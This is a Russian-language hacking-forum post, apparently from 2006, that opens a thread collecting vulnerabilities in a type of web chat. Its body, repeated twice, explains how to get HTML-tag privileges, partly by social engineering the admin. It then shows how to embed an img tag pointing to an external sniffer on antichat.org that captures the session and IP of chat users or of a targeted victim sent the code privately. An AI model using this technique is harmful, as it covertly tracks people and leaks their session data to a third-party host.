Хозяин
29.05.2006, 15:28
Народ, давайте в этой тебе постить уязвимости найденные в данном типе чатов (слишком мало информации по ним)
Только без всякого флуда! Нашел уязвимость - отписался.
Вопросов в этой теме тоже не надо. Пусть будет как сборник уязвимостей.
Внедрение сниффера (толку от этого мало, но все что пока сам нашел ... )
Для того, чтобы внедрить сниффер, нам нужны теги (кто общался с этими чатами, знает, что "html - теги, как привелегия выдаются по достижению определенного колличества часов проведенных в чате, ну или СИ, просите у админа ))
Дальше все просто )
Когда вы уже будете иметь данную привелегию, вы соответственно сможете вставлять картинку во фрейм чата вот так:
<img src=http://ссылка_на_ваш_рисунок>
Элементарно, вместо ссылки на рисуном, вставляем адес сниффера:
<img src=http://antichat.org/s/[ваш логин].gif>
Как я уже и сказал, толку от этого мало, сниффак ловит только сессию (с ней ничего сделать нельзя к сожалению) и айпи.
Единственная хоть и маленькая "полезность" - это то, что вы можете вставить код и отправить его в личку человеку, IP которого вы хотите узнать, без всякого его участия. (в логах будет ваш айпи и жертвы)
По тегам буду смотреть дальше, может что и нарою ... но уж очень хорошо там они фильтруются ...
Только без всякого флуда! Нашел уязвимость - отписался.
Вопросов в этой теме тоже не надо. Пусть будет как сборник уязвимостей.
Внедрение сниффера (толку от этого мало, но все что пока сам нашел ... )
Для того, чтобы внедрить сниффер, нам нужны теги (кто общался с этими чатами, знает, что "html - теги, как привелегия выдаются по достижению определенного колличества часов проведенных в чате, ну или СИ, просите у админа ))
Дальше все просто )
Когда вы уже будете иметь данную привелегию, вы соответственно сможете вставлять картинку во фрейм чата вот так:
<img src=http://ссылка_на_ваш_рисунок>
Элементарно, вместо ссылки на рисуном, вставляем адес сниффера:
<img src=http://antichat.org/s/[ваш логин].gif>
Как я уже и сказал, толку от этого мало, сниффак ловит только сессию (с ней ничего сделать нельзя к сожалению) и айпи.
Единственная хоть и маленькая "полезность" - это то, что вы можете вставить код и отправить его в личку человеку, IP которого вы хотите узнать, без всякого его участия. (в логах будет ваш айпи и жертвы)
По тегам буду смотреть дальше, может что и нарою ... но уж очень хорошо там они фильтруются ...